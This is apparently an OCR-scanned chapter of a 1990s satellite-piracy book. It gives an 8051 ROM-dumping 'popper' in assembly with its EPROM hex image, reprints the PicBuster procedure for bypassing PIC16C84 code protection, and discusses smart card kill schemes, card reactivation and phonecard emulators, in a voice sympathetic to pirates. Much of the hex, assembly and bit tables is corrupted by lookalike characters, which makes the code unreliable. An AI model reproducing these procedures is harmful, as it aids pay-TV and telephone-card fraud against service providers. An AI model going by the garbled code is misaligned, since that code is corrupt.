:10242000205920202020204F202020202020202044 
:1024300020206020202020204F202020202020202D 
:10244000202053204B20204B82020202059202020CA 
:102450002020204Ғ20202020202020202020602000 
:1024600020202020204Ғ2020202053535353202071 
:102470004B2020204B2020205920202020204F209E 
:10248000202020202020202020206020202020200C 
:1024900020204F202020202020202020202020200D 
:1024A0002020202020202020204F202020202020FD 
:1024B0002020202020206020202020202020204FAD 
:1024C0004F202020202020202020202020202020DD 
: 1024D0002020204F4F20202020202020202020209E 
: 1024E000202060202020202020202020204F4F4F1F 
:1024Ғ0004Ғ202020202020202020204Ғ4Ғ4Ғ4Ғ20Ғ1 
:102500002020202020202020202020202020602088 
:10251000202020202020202020202020204Ғ4Ғ4Ғ2Е 
:102520004Ғ4Ғ4Ғ4Ғ4Ғ4Ғ4Ғ20202020202020202062 
:102530002020202020202020202060202020202058 
:102540002020202020202020202020202020202088 
:102550002020202020202020202020202020202078 
:102560002020202020206020202020202020202028 
:1025700020202040554С5459204348414Е4Е454СЗА 
:102580005320202020202020202020202020202018 
:1025900020206020202020202020202020202020FB 
:102540002020202020202020202020202020202028 
:1025B0002020202020202020202020202020607E7D 
:1025С000С050С051С052Ғ55075510075520005520Ғ 
:0E25D000FDD551FAD550F7D052D051D050223F 
:00000001FF 
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A Later Version Of The 8051/8052 Popper 


A more streamline version of this hack has been circulating on BBSes and 
internet sites over the last year or so. The code is more streamlined in that it 
does not have the display routines. It is also somewhat better documented 
though the original documentation is in German. This file also includes a 
GIF of the circuit used for the popping. 

The EPROM image for this file is for a 27C256. The circuit uses the HCT 
version of the 74373. The supply voltage for the circuit is 5 Volts and the 
Vcc pins and supply decoupling capacitors are not shown. 


The comments in the disassembly have been approximated from German. 
Basically the routines are largely similar to those in the previous example. It 
is a barer and more efficient implementation in that it does not include the 
display routines of the previous example. 


$NODEBUG 
$GEN 


SETEA BIT P1.7 


CSEG AT RESET 
ORG 0 


JMP START. UP 


ORG 2000H ; Start 


START. UP: 
MOV SP, #60Н ; STACK VON 60-7F 
MOV PSW, #0 ; Clear PSW 
MOV P1,#0FFH ; Set All Ports To 1 
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MOV РЗ, #0FFH 

CALL INIT_RAM ; Initialise RAM 

CALL INIT_SFR ; Initialise Special Function Reg 
CLR SETEA ; Clear EA 

NOP 

NOP 

NOP 

NOP 

SETB EA 

MOV DPTR, #0 ; ROM-ADDRESS = 0000 (START) 


COPYLOOP: 
CLR A ; INDEX = 0 
МОУС A,@A+DPTR ; Load Byte From ROM 
CLR TI ; Clear Send Flag 
MOV SBUF,A ; Move byte to send register 
JNB TI,$ ; Jump To Send 
INC DPTR ; Increment pointer 
MOV A,DPH 
CINE A, 20H, COPYLOOP ; Repeat ... 0000-1FFFH 
NOP 
JMP $ 


INIT. RAM: 
MOV RO, #8 
CLRA ; Initialise RAM 08-5F 


FILL. RAM: 
MOV GRO,A 
INC RO 
CJNE RO,#5FH, FILL. RAM 
RET 


INIT. SFR: 
CLR FO ; Clear STATUS-FLAG 
CLR TRO ; TIMER 0 DISABLE 
CLR TR1 ; TIMER 1 DISABLE 
CLR IE1 ; Clear INT1 
CLR IEO ; Clear INTO 
SETB ITO ; INTO NEGATIVE Edge 
SETB IT1 ; INT1 NEGATIVE Edge 
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MOV PCON, #0 ; NORMAL BAUD RATE 

MOV TMOD, #00100001B ; T1=8-BIT AUTORELOAD, Т0-16-ВІТ 
MOV SCON, #01000000B ; 8-BIT UART, T1=BAUD RATE GENERATOR 
MOV TL1,#0FDH ; BAUDRATE in Low reg (9600BpS) 

MOV TH1,#0FDH ; BAUDRATE in High reg (9600BpS) 

CLR TF1 ; Clear T1-FLAG 

CLR TFO ; Clear TO-FLAG 

CLR EXO ; INTO DISABLE 

CLR EX1 ; INT1 DISABLE 

SETB TR1 ; T1 START 

CLR ES ; SERIAL INT DISABLE 

CLR REN ; TX DISABLE 

RET 


END 
Relevant Fragment Of EPROM Image 


:1020000075816075D0007590FF75B0FF12202F129A 
:102010002038C29700000000D2AF900000E493C2C5 
:1020200099F5993099FDA3E583B420F10080FE78FD 
:1020300008E4F608B85FFB22C2D5C28CC28EC28B00 
:10204000C289D288D28A7587007589217598407582 
:102050008BFD7 58DFDC28FC28DC2ABC2AAD28EC261 
:10206000ACC29C22FFFFFFFFFFFFFFFFFFFFFFFF5O 


PicBuster - Popping The PIC16C84 


For a long time, some of the most frequently asked questions on the 
Special Projects BBS were about Picbuster. Was it a program? Was it a 
device? Did it really exist? Essentially it was a Welsh Poet - Dai Ode. In 
other words a diode. 


The PIC16C84 has a design flaw that allows the contents of the EEPROM 
to be dumped out even after the EEPROM has been secured with the code 
protection option. This knowledge was initially closely guarded and spoken 
about in hushed tones. In April 1995 however, the details of the PicBuster 
procedure were released on the internet. From thereon it was downhill for 
the PIC16C84. This chip was the foundation of the European pirate smart 
card industry. With the information released on the internet, everyone knew 
how to pop the PIC. The result was that the code from every PIC16C84 
hack on VideoCrypt 09 and D2-MAC was floating around on the internet 
and the BBSes within a few days. There were no more secrets about the 
PIC16C84. 
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Up to that point, the standard method of popping a PIC was to actually 
remove the top of the chip and re-engineer the fuse. This technique was 
initially used on the EPROM OTP versions of the PIC microcontrollers such 
as the PIC16C54 and the PIC16C57. These are EPROM versions and the 
PicBuster method does not work on these chips. However the PIC16C84 
uses EEPROM. 


Ordinarily things like the PicBuster are not supposed to work as they are 
pushing the chip beyond the published maxima. The standard result when 
the fuses are reset is that the complete memory of the РІС16С84 is reset. In 
the normal programming mode there is a large difference between the 
programming voltage (approx 13.8 Volts) and the supply voltage (5 Volts). 


With the PicBuster technique, the difference between programming voltage 
and supply voltage is approximately OV6. The voltage drop across the diode 
is OV6 to 0У7. The OV6 voltage differential may not be enough to reset the 
entire memory but is enough to allow the configuration fuses to be reset. It 
seems that the configuration fuses are the first to be reset. 


The process of reading the chip is relatively simple - the protection fuse is 
rewritten so that the chip memory can be read out. The programmers will 
return an error message but this is ignored. The protection fuse overwrite 
has to be executed a few times. 


Some problems have been observed with chips that have been subjected to 
the picbusting process. When trying to reprogram them, the erase 
procedure does not completely erase the memory contents with the result 
that the programming fails. The supply voltage is then reset to 5 Volts and 
the programmer is powered down. After a while, the programmer is 
powered up and the memory contents of the chip can be read. It is really 
that simple. 


The majority of PIC16C84 programmers in operation in the Blackbox 
industry are based on the serial method of programming the chip. There are 
a number of designs used but the most popular are the Henk Schaer design 
and the David Tait design. These designs are available on the internet and 
most BBSes dealing with satellite television. Both are easily constructed and 
are low cost options. | have used the Schaer design to test the PicBuster 
process and it worked extremely well. 


The РІС16С84 is still widely used. In some applications it is used to control 
electronic locks such as those used on some of the more up-market cars. 
There was a court case in the UK in 1994 where the defendant was 
convicted for having in his possession a device that snatched the RF data 
from these electronic keys and replayed it to open the locks. 
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The use of PicBuster could be dangerous if it shown that there was a 
backdoor code (bad pun) that could be used by garages in the event of the 
car owner losing his electronic key. Of course it also means that someone 
could crack one of the electronic key fobs and obtain the codes illegally. 


Arizona Microchip seem to be implementing some sort of modification to 
PIC16C84 die to prevent the PicBuster technique from working. The new 
version of the chip is designated as PIC16C84A. However this is relatively 
futile when considering the vast amount of pirate PIC16C84 based 
smartcards that are still vulnerable to this hack. The pirate D2-MAC 
EuroCrypt-M cards using this microcontroller are being sold at a price less 
than the retail price of the PIC16C84. 


It is not known if the new version of the chip will prevent the sort of 
widespread piracy of pirate code that has plagued the Blackbox industry in 
Europe. In all probability the newer version will be popped. But this time the 
method of popping the code will not be released on to the internet. Of 
course some live in eternal hope. 


PicBuster Details As Released On Internet 


PicBuster 

The Pic chip (PIC16C84) can in fact have it's program and data 
memory read after the config fuses have been set to code protec- 
tion on. 

Try the following: 

Write some code to the chip with the code protection set to "ON". 
Read back to verify that the protection has indeed come on. 

Now set Vdd ( pin 14 ) to Vpp-0.5v, (Programming voltage less 
0.5V). 

Set config fuse to "OFF" and reprogram config fuse. 

Now set Vdd back to normal, «5v. 

Power off the programmer. 

Wait 10 to 20 sec. 

Power back on the programmer. (VDD at + 5V) 

Read the Pic.... and hey presto, data in unprotected format should 
now be available. 


The details above are those given in the original Usenet posting. The 
procedure as outlined above works. Most of the programmers in operation 
cane be modified by cutting a track and wiring in a switch that can select 
between (Vprogram - 0У6) and 5VO for the PIC16C84 positive supply pin. 
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There is a some what cyclical nature to security. The original systems 
designs were based on the secure embedded microcontroller principle. The 
smart card changed that. It was part of the detachable secure microcontrol- 
ler principle. Neither of these systems remained secure but the smart card 
based systems allowed for a simple, if costly, upgrade path. Newer system 
designs tend to integrate both elements. The best example of this is the 
dial-out modem option on the smart card based DirecTv system. 


However the smart card is not the ultimate solution in system security. In 
satellite television scrambling systems, they have become a licence to print 
money. Unfortunately for the channels that licence has been granted to the 
pirates. 


Prior to the introduction of smart card based systems, piracy was a 
box-shifting exercise. The boxes, (ie the descramblers) were heavy, 
occupied a lot of space and were difficult to transport throughout Europe or 
the United States. The smart card changed all of that. 


With the smart card based systems, it was possible to transport as much 
pirate product in a briefcase as would have previously required a couple of 
articulated trucks. The benefits of miniaturisation also worked for the pirates 
and hackers. 


This miniaturisation of the pirate device facilitated piracy in Europe on a 
scale seldom previously equaled. The channels introduced systems based 
on this new technology, thinking that it would reduce piracy. The people 
responsible for this lemmings’ rush by the channels are still around 
unfortunately. Perhaps it is more unfortunate for the channels than the 
pirates. 


The same thought patterns can be seen in the DVB venture. The DVB 
specification, if anything will facilitate piracy. It seems that the DVB even 
have problems on standardising the encryption overlay. They may give 
themselves grand titles and claim to be experts on piracy but they are not. 
They never were. And they probably never will be. 


The reason for this is simple. Having never worked in the pirate side of the 
Blackbox industry, they cannot think like pirates. According to Sun Tzu's 
“The Art Of War’, you should know the enemy as you know yourself. These 
people seem to spend too much time squabbling to even know themselves. 


This chapter deals with smart cards. Or to be more precise, it deals with the 
technology and the hacks. Some of the material here is drawn from the 
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previous versions but there new material. Some of it, the hacks perhaps, will 
cause embarrassment to the bureaucratic automata that traipse around 
claiming that their systems are totally secure. However there are few people 
these days who will argue that smart cards are secure. Only fools believe 
that smart cards are invincible. 


Some people may question my motivation for including information on 
telephone card hacking. Perhaps they may consider it vengeance for high 
telephone bills. The reason is more mundane. The original Pay Per View 
specifications of some systems included a combination of these memory 
cards and real smart cards. The 8052 in the VideoCrypt decoder has 
routines that handle both smart cards and memory cards. Of course the 
recent PPV hack in March has put the whole idea of PPV on VideoCrypt in 
doubt. Even Sky and News Datacom were not stupid enough to use 
memory cards as part of their European implementation. 


How Smart Is "Smart"? 


Smart cards are relatively cheap and ultimately disposable technology. The 
concept of disposable technology is a particularly modern one. Most 
countries in Europe have smart card payphone cards. There are of course 
countries like the UK that are using optical cards but British Telecom has 
introduced memory cards. In the USA there are some test programs using 
memory cards for payphone applications. 


The problem with smart cards is that the term has become too generalised. 
It has to cover a few types of card. The phone card is generally a memory 
card but for the purposes of marketing, it becomes a "smart card". 


Perhaps the best definition of a smart card is a card that contains a 
microprocessor and memory. The memory cards used for pre-paid applica- 
tions are, in this light at least, best viewed as dumb cards. 


There are essentially two classes of smart cards; contactless and contact. 
The contact type smart card requires direct electrical connection to the card 
reader. In many respects this is the cheaper option. The interface circuitry is 
kept to a minimum. 


The contactless smart card does not require a direct electrical connection to 
the card reader. Instead it uses a set of tuned circuits to pick up the signals 
from the card reader. Essentially three frequencies would be used. One 
frequency would be rectified to provide the card's DC supply voltage and the 
others would be used for data transmission. 
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Such complexity is not really suitable for Pay television applications. The 
cost is high and Pay television applications are often more concerned with 
getting the most efficient technology for a low price. 


The contact type of smart card requires direct electrical connection between 
the pads on the cards and the decoder socket. There is an ISO specification 
governing the construction and connection protocols of smart cards - 
15О-7816. Much of the information on the card protocols can be found in 
part three of this document. 


The ISO Specifications - The Pads & Card 


The connector specifications for the contact SMART card have been 
established as an ISO standard. The ISO standard specifies eight connec- 
tions of which only six are actively used. Many of the SMART cards used for 
payphones and banking applications follow the pattern that appears in the 
diagram. The typical payphone card is an EPROM memory card rather than 
a smart card. 


VideoCrypt's card does not look like it follows the pattern but it does have 
the same six connections on the connector array. Indeed the actual shapes 
of the pads on a card is an indicator as to the manufacturer of the card. 


There are also some strict guidelines covering the position of the pads on 
the card and indeed the actual dimensions of the card. Most of the pirate 
cards are about twenty millimetres longer than the official cards. This is to 
facilitate the use of surface mount chips. Some of the more recent decoders 
and IRDs have recessed card slots and this would cause problems as the 
chip would prevent the card from being fully inserted. 


SMART Card Structure 


The structure of the card is deceptively simple. It consists of a microproces- 
sor and memory. This description fits the microcontrollers used to control 
receivers and video recorders and indeed it the same types of chips are 
used in these applications. The type of memory used can vary. It generally 
involves Read Only Memory, Erasable Programmable Read Only Memory, 
Electrically Erasable Programmable Read Only Memory and Random 
Access Memory. 


The information stored in the ROM is fixed and cannot be altered without 
changing the design of the SMART card. The main routines that would be 
included in the card ROM are the card interface routines and other 
housekeeping functions. 
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The ISO Smart Card Standard 
Connector Functions. 


/ 


/ 


Supply Ground (0V? 
Voltage +5V.... 

"ә... Memory В/М Voltage 

Reset Typically 21V to e5v 





". Bidirectional Serial 
Data Port 9600 Baud 


Not Assigned 


Clock Signal 


Not Assigned 


Cross Section Of Smart Card 


Smart Card Chip 
PCB 2 


A Recess 
Connector Array Epoxy Resin Moulded 
Plastic : In Card 


Card 
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The information in the EPROM generally has to be erased with ultra violet 
light. This would imply that once the card has been programmed, the 
information cannot be erased in the card. Perhaps as a result the number of 
times that a series 05 (and before) Sky card could be killed and reactivated 
was limited. However the EEPROM versions are not limited in this respect. 
The EEPROM is more usable in SMART cards for one specific reason - it 
can be reprogrammed in the card. Of course it is now extremely dangerous 
to try and reprogram a card’s EEPROM over the air. If the card has been 
hacked then the hackers would be able to watch the new data arriving and 
create a fix. 


The actual card type used by Sky currently is a Siemens 8051 type. Prior to 
this card issue, the 10, they used a Motorola 6805 type. It is not known at 
this stage what the version used by D2-MAC EuroCrypt is but it is believed 
to be similar. However the Sky version is EEPROM whereas most of the 
cards used on TV3, TV1000 and FilmNet are EPROM. 


From this information, a memory map of a VideoCrypt SMART card can be 
guessed. The ROM area of the memory is the area where the main 
operational program is stored. The EEPROM area contains the algorithms 
and keys, the service data, the pay per view data, the card identity data and 
the billing period data. The RAM is used for temporary storage of data 
during processing. 


Due to the Vampire hack and the fact that all pirate 09 Sky cards had to 
have an image of the official card memory, this has become one of the most 
documented cards in history. There are complete disassemblies of the code 
available on BBSes and the internet. 


The EEPROM contains the enabling data for each channel that the card 
user has paid for. The data entry for each channel would consist of a 
channel identifier, a billing period, a regional identifier, key data and 
authorisation data for the channel. 


The design of a SMART card is complex and prototyping can take a few 
months. The ROM in the card has to be mask programmed. This essentially 
means that the programs to be stored in the ROM are designed as part of 
the chip. The procedure is straightforward. 


The programs to be included in the ROM are developed on a SMART card 
emulator. This is a microprocessor development system that is configured 
to imitate a SMART card. It is hooked to a personal computer. The program 
developer will write the programs on the computer, test them, and if they run 
successfully, load them into the SMART card emulator. The SMART card 
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emulator will then be plugged into a decoder to ensure that the programs 
work. 


The programs will then be supplied on floppy disc to the chip manufacturer. 
The manufacturer will program an EPROM with the programs and send it to 
the card issuer for verification. Once the EPROM is checked, the 
manufacturer will then produce the chips in sample quantity. These chips 
will also be tested for correct operation. The chips can then be mass 
produced. 


The chips are glued to a printed circuit board substrate with epoxy resin. 
The connection pins on the chip are wired to the connections on the 
substrate. The substrate connections are then wired to the connector array. 
The actual plastic card is injection moulded with an indent for the chip. The 
chip is then glued into the indent. The card is then tested to ensure that it is 
operational. 


The SMART card at this stage will only have the bare minimum of data. 
There will be no service data in the EEPROM. This data is programmed into 
the card by the card issuer. In VideoCrypt's case, the personalisation stage 
would be carried out at News Datacom’s Maidenhead facility. 


Perhaps the most important aspect of this operation is testing. The 
programs in the smart card must undergo extensive testing before they are 
released on to the market. This test stage is essential as a problem that 
would require a new card issue may occur when the card is in the market. 
Normally the test versions of the cards appear approximately three months 
before the new card issue commences. 


A definite trend in smart card security has been seen with News Datacom 
and Sky. The issue 10 card, the 0A, has used two chips; the smart card 
microcontroller and an Application Specific Integrated Chip (ASIC). This 
seems to be a response to the fact that smart card microcontrollers are no 
longer considered secure enough for use in satellite television applications. 


Indeed the hackers and pirates had completely popped the EEPROM and 
ROM of the 10 card by the time that Sky had activated it on 31/10/1995. It 
was the ASIC that had given Sky a reprieve of some five months before the 
hack finally hit the market. 


It is the ASIC that is currently causing problems for people wishing to 
implement a SEASON type program. The best probable solution is an ASIC 
emulator that connects via the parallel port. 
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A Smart Card Memory Map 


Masked ROM 


This section contains the housekeeper 
routines and the basic protocol routines. 


EEPROM 

This section holds most of the important 
data. It also typically holds the main 
ores algorithms and subscription 
details. 


RAM 
Used as temporary storage area. 





Simplified Smart Card Chip Structure 





Data 
Microprocessor ———— Reset 
EEPROM | Сіоск 
m 5V0 
lt- —— QV Gnd 





| RAM 
Masked ROM | 





The smartcard microcontroller is generally a secured version of an 
existing microcontroller. The best example of this was the Sky 09 
and Sky 07 microcontrollers which were developments of the 6805 
microcontroller. 


A typical modification is a bit scrambling of the data in the memory of the 
smartcard. This is achieved by modifying the addressing lines on the 
chip during the design process. It was used in the Sky 09 card. 
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SMART Card Operation 


The SMART card is essentially a partial computer on a card. It is a partial 
computer because it requires other circuitry and inputs to operate. The first 
requirement is supply voltage. This is generally a 5 Volt DC supply. 


The second requirement is a clock signal. This is a stable frequency square 
wave of 5 volts amplitude. This frequency is derived from a crystal in the 
decoder. The frequency used in the VideoCrypt card is 3.57 MHz. Higher 
clock frequencies can be used. 


The third requirement is a reset line. This is used to initiate the programs 
and routines in the card when the card is inserted into the socket. 


The fourth optional requirement is the EPROM voltage. The EPROM 
programming voltage is high, typically over twenty volts. This voltage is only 
on for a few milliseconds every three seconds. The chip would generate too 
much heat if it was continually fed with high voltage. The EEPROM versions 
do not require the 21 Volts programming voltage. The programming voltage 
required by the card is signaled іп the “Answer To Reset’, (ATR), block of 
data transmitted by the card. 


The fifth requirement is the data port. The data flows to and from the card 
on one line. It is serial data. This port would be connected to the RAM in the 
card. The serial data would be clocked into the RAM. The microprocessor 
on the chip would then read the data in a parallel format. In the VideoCrypt-1 
system, the data flows at 9600 Baud. Тһе VideoCrypt-ll system and the 
DirecTv system card initialises at 9600 Baud but then switches to 38400 
Baud for the data transfer. 


When the card is inserted into the decoder, the reset pin is activated. This 
zeroes the RAM and causes the microprocessor to select the boot-up 
program. This next routine in the program will verify that the card is valid for 
the period. 


The card will then read the data from the decoder. This data, along with 
service data from the EEPROM, will be used in the decryption algorithm 
stored in the EEPROM. The product of the decryption algorithm will then be 
passed back to the decoder. 


In the VideoCrypt system the information flowing to and from the smart card 
is useful in that it contains the addresses for cards being authorised and 
deauthorised as well as the actual decryption key. Other systems such as 
D2-MAC EuroCrypt-M and DSS have more complex packet structures. It 
can take some time to actually build up a knowledge of the packet 
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structures. Of course this was not necessary with the D2-MAC EuroCrypt-M 
system as it was a published standard. 


This data is passed via the 8052 Housekeeper microcontroller to a secure 
microcontroller, the ZC404044 or ZC404047, where it is then used in a 
further algorithm to generate the seed for cutpoint generator at the start of 
every field or frame. The secure microprocessor is actually a Mask ROM 
version of the 6805 microcontroller. Of course this chip has been popped 
and the program is on most BBSes and Internet sites dealing with satellite 
television. 


Pay Per View is extremely easy to implement with a SMART card. The card 
user will purchase a number of credits or tokens each billing period. A 
typical number would be 99 tokens. The SMART card would be pro- 
grammed so that the token counter would read 99 tokens. When ever the 
user wanted to watch a PPV film or event, a message would be shown on 
screen stating the number of tokens that the event is valued at. To watch 
the programme, the user would press the authorise or pay button on the 
front of the decoder. The decoder would then decrease the token register by 
the correct amount. 


Each service could have a token register. The actual operation of the 
counting mechanism would be more complex. It would be too easy to 
intercept the token count value and substitute a continual 99 tokens. This 
type of hack is commonly used in computer games and is known as an 
“Infinite Lives РОКЕ”. The original PPV algorithm for VideoCrypt lies mainly 
in the 8052. With the collapse of security over the issue 07, 09 and 10 
cards, News Datacom has had to change their PPV protocols to a more 
secure format 


The new protocol seems to be pre-booked PPV. The subscriber rings up 
the subscriber management centre and quotes his subscriber number. His 
card is then activated for that particular PPV event over the air. The PPV 
event is assigned a pseudo channel ID so that a card only has to be enabled 
to access that channel. When the PPV event is over, that channel ID is 
dispensed with. 


With the 10 card there are plans to introduce fully PPV channels later in 
1996. The subscriber will, according to some sources, have to pre-book the 
events. The first public PPV event on VideoCrypt-1 was hacked. It may be 
the case that the PPV events planned for later this year will also be hacked. 
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SMART Card Security And Addressing 


The VideoCrypt cards are valid once they leave the subscription centre. 
This means that they can be used in any VideoCrypt decoder. They can be 
deactivated over the air by Sky. The Quickstart cards are not valid until they 
have been activated by Sky. However Sky discontinued the Quickstart 
program in 1995 because they were losing too many smart cards to the 
hackers and pirates. 


In the VideoCrypt system, the kill signals can be global in that they knock 
out all channels or they can be channel specific. A sequence of packets with 
the kill instructions containing the IDs of the cards to be deactivated is 
transmitted continually. This sequence of kills is known as the Blacklist. 


When the kill occurs, a section of the EEPROM in the card is overwritten so 
that when the card is inserted into the decoder, it will not work on the 
relevant channels. In order to reactivate the card, the program providers 
Sky transmits the card’s ID as part of the Whitelist sequence. This is a 
sequence of packets that include the turn-on instruction and the IDs of the 
cards to be turned on. However the Whitelist is not a continually transmitted 
one. It changes as subscribers have their cards updated by ringing the 
subscriber management. With the Blacklist, the ID numbers to be killed are 
continually transmitted. 


With the 09 card, Sky had included a Drop-Dead code. By writing to a 
particular area of EEPROM controlling the communications protocol it was 
possible to send the card into an infinite loop. This code was referred to as 
the Code 99 ECM in the USA with the DSS card and as the Drop Dead ECM 
when used on the 09 card. The common factor here is that News Datacom 
did the security for both systems. 


The more recent trends in systems using SMART cards are towards 
sending the cards to the subscribers in an unactivated state. The subscriber 
has to ring the subscriber management centre to have the card activated 
over the air. This method of addressing is more time consuming and thus 
less economical. It is basically a trade off between medium security and 
better security. 


It appears that all of the 07 and 09 VideoCrypt cards were shipped with the 
keys for all of the channels. All the channels used a common algorithm and 
keytable. In terms of security it was disastrous and utterly stupid. It meant 
that the card could be activated by a Phoenix program to do all channels. 
Furthermore it ignored a potential firewall that could have limited the piracy 
to a channel by channel basis by having the relevant keys downloaded over 
the air rather than being already resident in the card. 
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D2-MAC EuroCrypt on the other hand is better in terms of key handling. It 
has a separate key set for each channel which it can change periodically. If 
the card does not have a valid management key it means that it can not be 
properly updated. The algorithm too is common in this system. 


Theoretically during personalisation, the subscriber's channel allocations 
are entered into EEPROM. Therefore the subscriber will only be able to 
access the channels for which they have paid. Other channels will appear 
as being blocked. 


The VideoCrypt system is based on the Exclusion Principle. All of the 
activated smart cards on the system are active until they receive a kill 
signal. It is definitely not the most secure format as it is possible to get a 
card and keep it out of the decoder for a few months. As the kill signal is 
only transmitted aperiodically, the chances of the card being killed are 
reduced. This problem may have been cured with the 10 card issue. 


Of course the fact that the VideoCrypt 07, 09 and 10 card issues have been 
hacked has destroyed confidence in VideoCrypt at least for this card issue. 
The only reason that some channels continue to use it is that there is no 
alternative scrambling system. VideoCrypt has a stranglehold on English 
language satellite transmissions. 


The main problem with the 09 issue was that the system’s card addressing 
and activation was cracked. It was therefore possible to reactivate the dead 
cards. Indeed given the procedure of the channel activation on the cards it 
was possible to selectively activate channels on a card. 


The program for activating the 09 Sky cards was known as the Phoenix 
program. This term is now used to describe any such program that activates 
channels on a smart card. It is dealt with in depth in Chapter 7. 


Memory Cards 


Memory cards are perhaps the very simplest form of smart cards. They are 
not actually smart in that they do not contain a microcontroller. They are 
basically memory with some addressing circuitry. In effect they are serial 
memory chips and as such, are easily read and programmed. Of course it 
follows that they are also, much to the disgust of the telecom companies, 
easily emulated. 


In the current pirate environment, the memory cards do not have enough 
security to be widely used in satellite television applications. The original 
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patent for the VideoCrypt system referred to the memory cards but it did not 
consider them to be secure enough to be used on their own. 


The commonest application of memory cards at present is as prepaid 
telephone cards. The vast majority of these telephone cards are straight 
memory cards. To put it simply they are 265 bit serial eproms. 


Newer versions are filtering into the market. These new versions are 
EEPROM however the vast majority of telephone cards are only EPROM. 
The reason for this is that the EPROM cards are exceedingly cheap. 


One of the first companies to introduce the phone cards was France 
Telecom. Like most pioneers, it ended up with arrows in its corporate back. 
They were, in some senses, victims of their own success. Of course other 
national telecoms companies followed France Telecom. These companies 
tend to be money-driven hulks that care little for the technology or the 
unfortunate telecom engineers and technicians who have to implement their 
strategies. 


The logic behind Telecom Еігеапп 5 choice of a totally compromised card 
system was, to say the least, commercial. The people making the decision 
did not seem to consider smart card piracy a threat. It would be a good 
conclusion to say that they were businessmen rather than technologists. 


The unofficial story about Telecom Еігеапп5 selection is that some 
management people at a seminar in France saw the benefits of the concept 
of phonecards when in a hotel lobby trying to make a phonecall home. On 
the spot, they decided that the idea of phonecards was a good thing. No 
more fumbling for strange slippery coins to shove into slots, the phonecard 
was the wave of the future. And it was simple to use. 


The deals were done and Telecom Eireann implemented their network of 
chip card based phones. From a physical security viewpoint it was actually a 
good move. The chip card telephone does not have to store cash. This 
means that the risk of the telephone being vandalised is somewhat reduced. 
It also opened up a new source of advertising income. Advertising space on 
phonecards was being sold so that companies and events could be 
advertised with their own phonecard. There are even people who collect 
such cards. But in the final analysis it is a disaster in terms of security. 


Pirate phonecard emulators have been appearing around Europe. In 
Ireland, phonecard emulators based on PIC16C84s have been seen though 
their use has been sparse. It is believed that some security people working 
at destroying the piracy networks have in the past, attempted to set up 
hackers by claiming to that these hackers were involved in phonecard 
piracy. 
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Example Of Phonecard Memory Map 


Bits 00 to 95 are the manufacturer/issuer area. This area is fuse 
protected and cannot be overwritten. 


Manufacturer Identifier? 
Application: Phone Card 
Currency Identifier 
Credits Value (50) 


7 Telcom Specific Information 


ооњнһнооооооњнњын 
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ноооњнњьооооон 
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нонмнооооооооьые 
њнооњњонһнооооо 
ооооњһњњнњнононо 
оннвымовнымооонво 


Country Identifier (Ireland) 


Credit Tokens Area 


Bits 96 to 255 make up the pro- 
grammable area of the card. These 
bits are set when the phone deducts 
a Credit from the card. As this area is 
EPROM, these bits cannot be reset 
without wiping everything. The actual 
time and effort involved in taking the 
wafer out of the card and removing 
the epoxy resin is not worth it. 


It is possible to read these memory 
cards as serial EPROMs. Radio 
Plans published a number of good 
articles on the subject a few years 
ago. 


эоооооооосооооовн-ыы-ы- 
OOoooooooooooonnnnnnon 
OoOoooooooooooonnononmnnoan 
оооооооооооооњњьььньньн 
оооооооооооорооњьнньнн 
OOooooooooooooonnnnnun 
OOoOoooooooooooononnnnun 
OOoOoooooooooooonbononnn 





The PPV version of a memory card may not be that different from 
the model above. The manufacturer area of the card may well hold the 
key tables for the programmes. The Credits area may also hold a set 
of key tables for the relevant programmes. Of course as the decoder 
uses the key tables for each programme, then that particular table 
would be overwritten. It is unlikely that the memory cards would be 
used on their own for PPV applications. Even the VideoCrypt patent 
application mentions how insecure they are. 
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Of course the hackers were not involved in pirate phonecards. The logic 
was apparent to anyone who knew about piracy. The pirate Sky and 
D2-MAC cards were on sale for about £40. A phonecard emulator, using a 
РІС16С84 would only retail for £20. It also required a different PCB than a 
standard pirate satellite television card. It was not economically viable. 
Besides most hackers are intent on hacking satellite channels rather than 
hacking the phone system. It is perhaps safer. The incidents do however 
illustrate the depths to which those associated with the channel's anti-piracy 
programs will sink to. You almost get the image of these guys trying to pin 
the JFK assassination on a hacker. 


The Security Of Memory Cards 


Perhaps it might be better to label this section "The Insecurity Of Memory 
Cards". Most of the hacks on memory cards are aimed at phonecards or 
stored value cards. In terms of security, the phonecards are abysmal. Since 
they are serial EPROMs, a number of hacks are possible. 


The 256 bits on the EPROM are arranged in 4 bit wide areas. The first 96 
bits are the manufacturer and issuer codes. These bits identify the telecom 
company and the country of use. 


The other 160 bits are used to indicate the card value and the number of 
available credits. It is not possible to reprogram these cards to give higher 
values. 


One of the earliest was the Infinite Lives hack. Since the EPROM required 
21 to 23 Volts for a successful write operation, the write voltage was 
stopped from getting to the write pad on the smart card. A number of 
materials were used ranging from insulating tape to nail varnish. 


It was easy for the telcos to ECM this hack. It was simply a case of changing 
the program in the telephone so that it checked that the card was writable. 
In logistical terms it would have been nightmarish as each telephone would 
have the have had its EPROM changed. 


The First Phonecard Emulators 


The phonecards are electronically simple devices. As a result they have 
been continuously hacked since their introduction in the early eighties. The 
hacks that prevented the EPROM from being written to were primitive. 
Hackers and phreakers with electronic engineering backgrounds started to 
become interested in the problem. 
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The first emulator design was to implement the phonecard using discrete 
circuitry. The design consisted of some clocking circuitry, some addressing 
circuitry and an EPROM. The EPROM contained images of a number of 
phonecards. A switch would select the images by switching between the 
data lines of the EPROM. Since the phonecard is a serial EPROM, there is 
only one data line and the addressing is carried out internally. The emulator 
did much the same thing but with discrete and readily available compo- 
nents. 


Thus when this EPROM emulator was inserted in the phone's card slot it 
would appear to be an ordinary phonecard. When all of the card images on 
the EPROM were used it was simply a case of reprogramming the EPROM 
with new ones. It was convenient for people with the access to computers, 
EPROM programmers and UV erasers but it was just not commercially 
viable. Indeed none of the early hacks could be classified as commercially 
viable in the way that pirate satellite television cards are. 


This serial EPROM emulator held the seeds of its own downfall. It was a 
device that was constructed on a PCB that only partially looked like a 
phonecard. There was an extended area of the board that carried the 
circuitry and therefore it was bigger than a phonecard. 


The telephone manufacturers began to include a sliding door on the newer 
versions of the phones. The sliding door would mean that any oversized 
card, such as a serial EPROM emulator, would be too long and the door 
would jam. When the door would not close, the phone would not work. 


Second Generation Emulators 


The second generation of phonecard emulators were more commercially 
orientated than the originals. These new designs were based on microcon- 
trollers rather than the discrete EPROMs and CMOS logic. 


Prior to the PIC16C84 model, the commonest microcontrollers were the 
8751 and the 68705. Phonecard emulators programs for these microcon- 
trollers were widely available on BBSes associated with the phreaking 
scene. But these devices were still far from commercialised. 


Two methods of loading the phonecard memory image into the emulator 
